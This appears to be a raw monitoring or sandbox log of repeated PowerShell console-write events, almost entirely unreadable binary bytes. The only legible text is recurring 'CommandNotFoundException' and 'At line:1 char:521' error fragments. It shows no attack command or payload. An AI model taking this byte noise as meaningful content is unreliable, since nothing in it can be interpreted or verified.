Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S................Hxk....................................}..v.... .......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._................Ixk......M.............................}..v............0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._................Hxk....................................}..v.... .......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....k................Ixk......M.............................}..v............0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....k................Hxk....................................}..v.... .......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....w................Ixk......M.............................}..v............0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....w................Hxk....................................}..v.... .......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v............0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....................................}..v.... .......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v....."......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk.....#..............................}..v.... $......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v.....*......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk.....+..............................}..v.... ,......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v.....2......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk.....3..............................}..v.... 4......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v....X9......0.......................h.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk.....:..............................}..v.....:......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v....XA......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk.....B..............................}..v.....B......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ . . .o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n......F......0...............8.M.....4.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....xG..............................}..v.....G......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk....................................}..v....8M......0.......................l.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk.....M..............................}..v....pN......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ ........Ixk......M.............................}..v.....R......0...............8.M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk.....R..............................}..v....8S......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v............0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....`...............................}..v............0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v............0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....`...............................}..v............0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v....H.......0.......................~.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....................................}..v............0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.2.1.............}..v............0...............8.M.....$.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....H...............................}..v............0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....'................Ixk......M.............................}..v............0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....'................Hxk....H...............................}..v............0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....3................Ixk......M.............................}..v............0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....3................Hxk....H...............................}..v............0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....?................Ixk......M.............................}..v............0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....?................Hxk....H...............................}..v............0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....K................Ixk......M.............................}..v............0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....K................Hxk....H...............................}..v............0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....W................Ixk......M.............................}..v.....&......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....W................Hxk....H'..............................}..v.....'......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....c................Ixk......M.............................}..v............0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....c................Hxk....H/..............................}..v...../......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....o................Ixk......M.............................}..v.....6......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....o................Hxk....H7..............................}..v.....7......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....{................Ixk......M.............................}..v.....>......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....{................Hxk....H?..............................}..v.....?......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v.....E......0.......................h.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk.....E..............................}..v....8F......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................0................................wI..... .......................}..v.....M...... ...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk.....M..............................}..v....8N......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ . . .o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n.....hR......0...............8.M.....4.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk.... S..............................}..v.....S......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v.....X......0.......................l.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk.....Y..............................}..v.....Z......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ ........Ixk......M.............................}..v.....]......0...............8.M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....`^..............................}..v.....^......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v....p[......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....(\..............................}..v.....\......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v....pc......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....(d..............................}..v.....d......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v.....j......0.......................~.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk.....j..............................}..v....Hk......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.2.1.............}..v....Xo......0...............8.M.....$.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk.....p..............................}..v.....p......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v....Xw......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk.....x..............................}..v.....x......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v....X.......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....................................}..v............0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v....X.......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....................................}..v............0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v....X.......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....................................}..v............0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....+................Ixk......M.............................}..v....X.......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....+................Hxk....................................}..v............0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....7................Ixk......M.............................}..v....X.......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....7................Hxk....................................}..v............0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....C................Ixk......M.............................}..v....X.......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....C................Hxk....................................}..v............0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....O................Ixk......M.............................}..v....X.......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....O................Hxk....................................}..v............0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....[................Ixk......M.............................}..v............0.......................h.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....[................Hxk....................................}..v............0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....g................Ixk......M.............................}..v............0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....g................Hxk....................................}..v............0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....s....... . . .o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n.....0.......0...............8.M.....4.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....s................Hxk....................................}..v....h.......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v............0.......................l.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....`...............................}..v............0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ ........Ixk......M.............................}..v....p.......0...............8.M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....(...............................}..v............0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v............0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....................................}..v....(.......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v............0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....................................}..v....(.......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v............0.......................~.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....H...............................}..v............0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.2.1.............}..v............0...............8.M.....$.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....................................}..v............0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v............0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....................................}..v............0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v............0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....................................}..v............0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v............0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....................................}..v............0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v............0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....................................}..v............0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v............0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....................................}..v............0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v............0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....................................}..v............0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v............0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....................................}..v............0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....#................Ixk......M.............................}..v............0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....#................Hxk....................................}..v............0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../................Ixk......M.............................}..v....H#......0.......................h.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../................Hxk.....$..............................}..v.....$......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;................Ixk......M.............................}..v....H+......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;................Hxk.....,..............................}..v.....,......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G....... . . .o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n......0......0...............8.M.....4.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G................Hxk....h1..............................}..v.....1......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S................Ixk......M.............................}..v....(7......0.......................l.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S................Hxk.....7..............................}..v....`8......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._....... ........Ixk......M.............................}..v.....;......0...............8.M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._................Hxk.....<..............................}..v....(=......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....s................Ixk......M.............................}..v.....6......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....s................Hxk.....7..............................}..v.....8......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v.....>......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....................................}..v.....@......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v....pE......0.......................~.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....(F..............................}..v.....F......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.2.1.............}..v.....J......0...............8.M.....$.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....pK..............................}..v.....K......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v.....R......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....pS..............................}..v.....S......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v.....Z......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....p[..............................}..v.....[......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v.....b......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....pc..............................}..v.....c......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v.....j......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....pk..............................}..v.....k......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v.....r......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....ps..............................}..v.....s......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v.....z......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....p{..............................}..v.....{......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v............0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....p...............................}..v............0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v............0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....p...............................}..v............0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v....(.......0.......................h.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....................................}..v....`.......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v....(.......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....................................}..v....`.......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ . . .o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n.............0...............8.M.....4.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................0................................wI..... .......................}..v............ .................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....'................Ixk......M.............................}..v............0.......................l.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....'................Hxk....................................}..v....@.......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....3....... ........Ixk......M.............................}..v............0...............8.M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....3................Hxk....................................}..v............0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G................Ixk......M.............................}..v....P.......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G................Hxk....................................}..v............0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S................Ixk......M.............................}..v....P.......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S................Hxk....................................}..v............0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._................Ixk......M.............................}..v............0.......................~.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._................Hxk....................................}..v....(.......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....k.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.2.1.............}..v....8.......0...............8.M.....$.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....k................Hxk....................................}..v....p.......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....w................Ixk......M.............................}..v....8.......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....w................Hxk....................................}..v....p.......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v....8.......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....................................}..v....p.......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v....8.......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....................................}..v....p.......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v....8.......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....................................}..v....p.......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v....8.......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....................................}..v....p.......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v....8.......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....................................}..v....p.......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v....8.......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....................................}..v....p.......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v....8.......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....................................}..v....p.......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v............0.......................h.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....................................}..v............0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v............0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....`...............................}..v............0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ . . .o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n.............0...............8.M.....4.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....................................}..v....H.......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v............0.......................l.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....@...............................}..v............0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ ........Ixk......M.............................}..v....P.......0...............8.M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....................................}..v............0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v.....0......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....p1..............................}..v.....1......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................0.......'........................wI..... .......................}..v.....8...... ...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....'................Hxk....p9..............................}..v.....9......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....3................Ixk......M.............................}..v....X?......0.......................~.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....3................Hxk.....@..............................}..v.....@......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.2.1.............}..v.....D......0...............8.M.....$.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G................Hxk....XE..............................}..v.....E......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S................Ixk......M.............................}..v.....L......0...............................................
